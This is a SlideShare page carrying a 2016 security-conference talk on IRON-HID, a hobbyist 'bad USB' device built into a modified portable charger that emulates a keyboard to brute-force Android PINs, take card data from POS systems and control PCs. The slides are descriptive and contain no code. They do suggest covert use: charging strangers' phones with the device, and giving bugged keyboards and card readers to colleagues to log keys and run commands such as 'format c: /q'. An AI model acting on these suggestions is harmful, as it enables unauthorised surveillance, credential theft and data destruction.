SlideShare a Scribd company logo

HITBSecConf 2016-Create Your Own Bad Usb

Seunghun han
Seunghun han

This document describes IRON-HID, a project for creating custom USB devices that can exploit system vulnerabilities. It discusses using a modified portable charger called PowerShock to test vulnerabilities in smartphones, POS systems, and PCs. The PowerShock uses a Teensy or Arduino board running IRON-HID firmware to emulate a keyboard or mass storage device. It can automatically enter PINs, log keystrokes, capture screenshots, and execute commands on connected devices. Demo attacks show exploiting backup PIN locks on Android phones and grabbing card data from vulnerable POS systems. Additional ideas include modifying USB keyboards and card readers to secretly run the IRON-HID tests on colleague's devices.

1 of 46
Download to read offline
IRON-HID: Create your own bad USB Seunghun Han
Who am I ?  Security researcher at NSR (National Security Research Institute of South Korea)  Operating system and firmware developer  Author of the book series titled “64-bit multi- core OS principles and structure, Vol.1 & 2”  a.k.a kkamagui (crow or raven in English) - @kkamagui1
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of a Smartphones  Testing a Vulnerability of a POS System and a PC  Bonus Contents
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
IRON-HID Human Interface Device for making your tools IRON-HID Project? =
Features  Custom device + firmware + test agent program + Android smartphone program  Various types of system exploitable  POS (Point-of-Sale), PC, Android, etc.  Lightweight embedded hardware-based  “Arduino” and “Teensy”  Open-source project!  https://github.com/kkamagui/IRON-HID
Arduino vs Teensy Arduino Teensy Arduino Mega Teensy++ 2.0 Larger (Palm size) Smaller (Paper-clip size) 256KB Flash (ATmega16U2 + ATmega2560) 128KB Flash (AT90USB1286) 60 I/O Pins 46 I/O Pins Arduino Sketch IDE is available!
USB Proxy DeviceCommander Targets Attach Custom Device Wireless Test Agent
Target POS systems, PCs, smartphones Embedded hardware (Low-powered hardware) Wireless module (WiFi, Bluetooth, Cellular, etc.) Receive results of commands Receive status of a proxy device Execute shell commands Send keyboard events Capture screens Get files Send commands and events Install a test agent program Receive results of commands (Results of shell, screens, files) Test agent (TA) program IRON-HID firmware (USB functions and a CD-ROM image) Custom device (in proxy devices) : IRON-HID component Security inspector’ smartphone IRON-HID commander program
IRON-HID Firmware  Emulates keyboard and mass-storage device  It has one interrupt type endpoint for sending and logging keyboard events  It has two bulk type endpoints for installing the TA program  Makes a custom communication channel  It has one control type endpoint for making a tunnel between the TA program and the Commander program
TA program and IRON-HID Commander  TA program processes requests of Commander  Command Executions, Screen Captures, File Transfers  Commander is an interface of pen-testers  It has control tab, command tab, key tab  Penetration tester uses each tab for testing security holes
Direction Format Description Commander  TA program C;<command>; Commander requests that TA program executes a command and sends result to Commander Commander  TA program G;<filename>; Commander requests that TA program sends a file to Commander Commander  TA program S;; Commander requests that TA program captures a screenshot and sends it to Commander TA program  Commander F;;<64byte data>; TA program sends results to Commander Commander  Firmware <Magic string 1> Commander changes firmware’s mode to command transfer mode Commander  Firmware <Magic string 2> Commander changes firmware’s mode to keyboard event mode Commander  Firmware <Magic string 3> Commander requests that firmware installs TA program into host Firmware  Commander M;;<keyboard event>; Firmware sends user’s keyboard inputs to Commander Firmware  Commander D;;<debug message>; Firmware sends debug messages to Commander
We are ready to launch! Choose a target to attachit
We want a portable charger  We use the smartphone everywhere!!  We spend much time with the smartphone  But, it doesn’t have enough battery  So, you should bring your charger or …
So many portable chargers…
So many battery rental services…
Hey, You totally believe your portable charger?
PowerShock!!  It is a portable charger, but not normal  It has IRON-HID inside it  It can test Android smartphones  It can test POS(Point-Of-Sale) Systems  It can test your PC It is a perfect weapon for penetration testers
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
Tools you need
Inside of the portable charger  It has a very simple architecture  A charger module and battery cells  High capacity model  More battery cells!
Cutting off battery cells  Make some space for IRON-HIDs  Battery cells are connected in parallel  Cut off the cell connector carefully
Pin layouts of the charger module USB Connector for Input (recharging) USB Connector for Output (smartphone) VCC Data- Data+ GND VCC Data- Data+ GND ID (No.1)(No.5) (No.1)(No.4)
USB Datasheet (VCC) (GND) (VCC) (GND) (VCC) (GND) Micro Type A Type Mini Type
Pin layouts of the IRON-HID VCC GND TX RX CTS RTS Bluetooth Serial Module (RN-42 Silver) Teensy D2 (RX) D3 (TX) GND 5V OUT Bluetooth TX RX GND VCC VCC Data- Data+ GND IDTeensy
You got the power!! * Rebirth of the Portable Charger *
 It activates the USB host function of smart-phones  You can connect various types of USB peripherals such as a keyboard, a mass- storage (USB drive), a mouse USB OTG (On-The-Go) * The final piece of the puzzle *
… ?! … Smartphone PowerShockCables
… ?! … Smartphone PowerShockCables THIS IS NOT WHAT I WANT OH…
Making a custom OTG cable Connect the ID pin with the GND pin
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
Well-known Smartphone Vulnerability Do you use a pattern lock? Do you set a backup PIN? Can you type backup PINs unlimitedly? Yes Yes No No No Yes You are in danger You are safe (maybe…)
 Connect PowerShock to a smartphone with the custom OTG cable and fire!!  It is really hard to test the vulnerability with your hands  The PowerShock tests it instead of you  It sends PINs quickly and automatically!! Testing the vulnerability If someone asks you to charge a phone, charge it with PowerShock!!
Demo (Let’s test the Android)
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
Inside of the POS Systems Parallel Port USB + LAN Serial Port PS/2 Many POS systems are PC-based!! ==
If the PowerShock plugs into the POS? If POS system has a vulnerability, you can grab card numbers!! Recharge Card Num: XXXX-XXXX Date: XX/XXPOS System PowerShock USB
Demo (Let’s test the POS system)
 Background and Architecture of IRON-HID  Hacking a Portable Charger  Testing a Vulnerability of the Smartphone  Testing a Vulnerability of the POS System and the PC  Bonus
KeyboardShock Attach IRON-HID onto USB keyboards and give them to your colleagues
Find the key matrix with multimeter
The example of the keyboard matrix
ReaderShock Attach IRON-HID onto card readers and give them also to your colleagues
Then… You will be the big brother for fun!! Logging and sending keys Receiving files and capturing screenshots Executing commands C:> notepad no-mercy.txt C:> format c: /q
Resources  http://www.fourwalledcubicle.com  http://cdemu.blogspot.com  http://www.usb.org  https://www.arduino.cc  https://www.pjrc.com/teensy
I will be waiting for your email @kkamagui1, hanseunghun@nsr.re.kr Thank you !

Recommended

HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent SandboxHITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
Seunghun han
 
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel ProtectorBlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
Seunghun han
 
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
CODE BLUE
 
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kuniyasu Suzaki
 
Secret of Intel Management Engine by Igor Skochinsky
Secret of Intel Management Engine by Igor SkochinskySecret of Intel Management Engine by Igor Skochinsky
Secret of Intel Management Engine by Igor Skochinsky
CODE BLUE
 
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇACODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
Yashin Mehaboobe
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NoSuchCon
 

Recommended

HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent SandboxHITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
HITBSecConf 2017-Shadow-Box-the Practical and Omnipotent Sandbox
Seunghun han
 
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel ProtectorBlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
BlackHat Asia 2017-Myth and Truth about Hypervisor-Based Kernel Protector
Seunghun han
 
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
A Security Barrier Device That Can Protect Critical Data Regardless of OS or ...
CODE BLUE
 
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kernel Memory Protection by an Insertable Hypervisor which has VM Introspec...
Kuniyasu Suzaki
 
Secret of Intel Management Engine by Igor Skochinsky
Secret of Intel Management Engine by Igor SkochinskySecret of Intel Management Engine by Igor Skochinsky
Secret of Intel Management Engine by Igor Skochinsky
CODE BLUE
 
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇACODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE 2014 : BadXNU, A rotten apple! by PEDRO VILAÇA
CODE BLUE
 
Making and breaking security in embedded devices
Making and breaking security in embedded devicesMaking and breaking security in embedded devices
Making and breaking security in embedded devices
Yashin Mehaboobe
 
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch ProtectionsNSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NSC #2 - D2 01 - Andrea Allievi - Windows 8.1 Patch Protections
NoSuchCon
 
Live Memory Forensics on Android devices
Live Memory Forensics on Android devicesLive Memory Forensics on Android devices
Live Memory Forensics on Android devices
Nikos Gkogkos
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromised
Area41
 
Hardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to RootHardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to Root
Yashin Mehaboobe
 
IoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT DevkitIoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT Devkit
Vasily Ryzhonkov
 
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor SkochinskyインテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
CODE BLUE
 
Linux Kernel Exploitation
Linux Kernel ExploitationLinux Kernel Exploitation
Linux Kernel Exploitation
Scio Security
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CanSecWest
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzing
Tamas K Lengyel
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with Xen
Tamas K Lengyel
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel Hacking
Develer S.r.l.
 
Tapping into the core
Tapping into the coreTapping into the core
Tapping into the core
Positive Hack Days
 
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical CodeHyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
Francesco Gadaleta
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 
Implement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVMImplement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVM
National Cheng Kung University
 
Android for Embedded Linux Developers
Android for Embedded Linux DevelopersAndroid for Embedded Linux Developers
Android for Embedded Linux Developers
Opersys inc.
 
Unix v6 Internals
Unix v6 InternalsUnix v6 Internals
Unix v6 Internals
National Cheng Kung University
 
Shorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation SystemsShorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation Systems
National Cheng Kung University
 
Android Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android AppsAndroid Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android AppsMoe Tanabian
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!
Codemotion
 
Extending Android with New Devices
Extending Android with New DevicesExtending Android with New Devices
Extending Android with New Devices
Shree Kumar
 
Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -
Seungjoo Kim
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
Yogesh Ojha
 

More Related Content

What's hot

Live Memory Forensics on Android devices
Live Memory Forensics on Android devicesLive Memory Forensics on Android devices
Live Memory Forensics on Android devices
Nikos Gkogkos
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromised
Area41
 
Hardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to RootHardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to Root
Yashin Mehaboobe
 
IoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT DevkitIoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT Devkit
Vasily Ryzhonkov
 
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor SkochinskyインテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
CODE BLUE
 
Linux Kernel Exploitation
Linux Kernel ExploitationLinux Kernel Exploitation
Linux Kernel Exploitation
Scio Security
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CanSecWest
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzing
Tamas K Lengyel
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with Xen
Tamas K Lengyel
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel Hacking
Develer S.r.l.
 
Tapping into the core
Tapping into the coreTapping into the core
Tapping into the core
Positive Hack Days
 
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical CodeHyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
Francesco Gadaleta
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 
Implement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVMImplement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVM
National Cheng Kung University
 
Android for Embedded Linux Developers
Android for Embedded Linux DevelopersAndroid for Embedded Linux Developers
Android for Embedded Linux Developers
Opersys inc.
 
Unix v6 Internals
Unix v6 InternalsUnix v6 Internals
Unix v6 Internals
National Cheng Kung University
 
Shorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation SystemsShorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation Systems
National Cheng Kung University
 
Android Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android AppsAndroid Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android AppsMoe Tanabian
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!
Codemotion
 
Extending Android with New Devices
Extending Android with New DevicesExtending Android with New Devices
Extending Android with New Devices
Shree Kumar
 

What's hot (20)

Live Memory Forensics on Android devices
Live Memory Forensics on Android devicesLive Memory Forensics on Android devices
Live Memory Forensics on Android devices
 
Halvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromisedHalvar Flake: Why Johnny can’t tell if he is compromised
Halvar Flake: Why Johnny can’t tell if he is compromised
 
Hardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to RootHardware Reverse Engineering: From Boot to Root
Hardware Reverse Engineering: From Boot to Root
 
IoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT DevkitIoT Getting Started with Intel® IoT Devkit
IoT Getting Started with Intel® IoT Devkit
 
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor SkochinskyインテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
インテルMEの秘密 - チップセットに隠されたコードと、それが一体何をするかを見出す方法 - by イゴール・スコチンスキー - Igor Skochinsky
 
Linux Kernel Exploitation
Linux Kernel ExploitationLinux Kernel Exploitation
Linux Kernel Exploitation
 
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
CSW2017Richard Johnson_harnessing intel processor trace on windows for vulner...
 
VM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzingVM Forking and Hypervisor-based fuzzing
VM Forking and Hypervisor-based fuzzing
 
VM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with XenVM Forking and Hypervisor-based Fuzzing with Xen
VM Forking and Hypervisor-based Fuzzing with Xen
 
Workshop su Android Kernel Hacking
Workshop su Android Kernel HackingWorkshop su Android Kernel Hacking
Workshop su Android Kernel Hacking
 
Tapping into the core
Tapping into the coreTapping into the core
Tapping into the core
 
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical CodeHyperforce: Hypervisor-enForced Execution of Security-Critical Code
Hyperforce: Hypervisor-enForced Execution of Security-Critical Code
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Implement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVMImplement Runtime Environments for HSA using LLVM
Implement Runtime Environments for HSA using LLVM
 
Android for Embedded Linux Developers
Android for Embedded Linux DevelopersAndroid for Embedded Linux Developers
Android for Embedded Linux Developers
 
Unix v6 Internals
Unix v6 InternalsUnix v6 Internals
Unix v6 Internals
 
Shorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation SystemsShorten Device Boot Time for Automotive IVI and Navigation Systems
Shorten Device Boot Time for Automotive IVI and Navigation Systems
 
Android Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android AppsAndroid Forensics: Exploring Android Internals and Android Apps
Android Forensics: Exploring Android Internals and Android Apps
 
Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!Lab Handson: Power your Creations with Intel Edison!
Lab Handson: Power your Creations with Intel Edison!
 
Extending Android with New Devices
Extending Android with New DevicesExtending Android with New Devices
Extending Android with New Devices
 

Similar to HITBSecConf 2016-Create Your Own Bad Usb

Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -
Seungjoo Kim
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
Yogesh Ojha
 
Hacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TVHacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TV
Seungjoo Kim
 
Lesson 2.5 Mobile Apps and Mobile Devices.pptx
Lesson 2.5 Mobile Apps and Mobile Devices.pptxLesson 2.5 Mobile Apps and Mobile Devices.pptx
Lesson 2.5 Mobile Apps and Mobile Devices.pptx
TarOgre
 
Hyperchem Ma, badbarcode en_1109_nocomment-final
Hyperchem Ma, badbarcode en_1109_nocomment-finalHyperchem Ma, badbarcode en_1109_nocomment-final
Hyperchem Ma, badbarcode en_1109_nocomment-final
PacSecJP
 
CheapSCAte: Attacking IoT with less than $60
CheapSCAte: Attacking IoT with less than $60CheapSCAte: Attacking IoT with less than $60
CheapSCAte: Attacking IoT with less than $60
Riscure
 
Practical Security Assessments of IoT Devices and Systems
Practical Security Assessments of IoT Devices and Systems Practical Security Assessments of IoT Devices and Systems
Practical Security Assessments of IoT Devices and Systems
Ollie Whitehouse
 
Laptop repairing course details
Laptop repairing course detailsLaptop repairing course details
Laptop repairing course detailsjyotichhabra
 
IoThings you don't even need to hack
IoThings you don't even need to hackIoThings you don't even need to hack
IoThings you don't even need to hack
Slawomir Jasek
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
Rapid7
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
Felipe Prado
 
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdfIDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
Kondal Kolipaka
 
Snug2007 Presentation
Snug2007 PresentationSnug2007 Presentation
Snug2007 Presentation
clkalyan
 
AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A GlanceAVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
Scott Faria
 
Arduino camera interfacing OV7670
Arduino camera interfacing OV7670Arduino camera interfacing OV7670
Arduino camera interfacing OV7670
Somnath Sharma
 
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdfDEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
DEFCON-21-Koscher-Butler-The-Secret-Life-of-SIM-Cards-Updated.pdf
Wlamir Molinari
 
FPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusionFPGA_prototyping proccesing with conclusion
FPGA_prototyping proccesing with conclusion
PersiPersi1
 
Connected Cars - Poster Child for the IoT Reality Check
Connected Cars - Poster Child for the IoT Reality CheckConnected Cars - Poster Child for the IoT Reality Check
Connected Cars - Poster Child for the IoT Reality Check
Security Innovation
 

Similar to HITBSecConf 2016-Create Your Own Bad Usb (20)

Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -
 
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh OjhaKazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
KazHackStan Doing The IoT Penetration Testing - Yogesh Ojha
 
Hacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TVHacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TV
 
Lesson 2.5 Mobile Apps and Mobile Devices.pptx
Lesson 2.5 Mobile Apps and Mobile Devices.pptxLesson 2.5 Mobile Apps and Mobile Devices.pptx
Lesson 2.5 Mobile Apps and Mobile Devices.pptx
 
Hyperchem Ma, badbarcode en_1109_nocomment-final
Hyperchem Ma, badbarcode en_1109_nocomment-finalHyperchem Ma, badbarcode en_1109_nocomment-final
Hyperchem Ma, badbarcode en_1109_nocomment-final
 
CheapSCAte: Attacking IoT with less than $60
CheapSCAte: Attacking IoT with less than $60CheapSCAte: Attacking IoT with less than $60
CheapSCAte: Attacking IoT with less than $60
 
Practical Security Assessments of IoT Devices and Systems
Practical Security Assessments of IoT Devices and Systems Practical Security Assessments of IoT Devices and Systems
Practical Security Assessments of IoT Devices and Systems
 
Laptop repairing course details
Laptop repairing course detailsLaptop repairing course details
Laptop repairing course details
 
IoThings you don't even need to hack
IoThings you don't even need to hackIoThings you don't even need to hack
IoThings you don't even need to hack
 
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
 
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdfIDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
IDF_Eclipse_Plugin_EclipseCon2020_v2.pdf
 
Snug2007 Presentation
Snug2007 PresentationSnug2007 Presentation
Snug2007 Presentation
 
Resume
ResumeResume
Resume
 
AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
AVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A GlanceAVR HOW-TO GUIDE Interfacing SPI-Ethernet With AVR Slicker Contents At A Glance
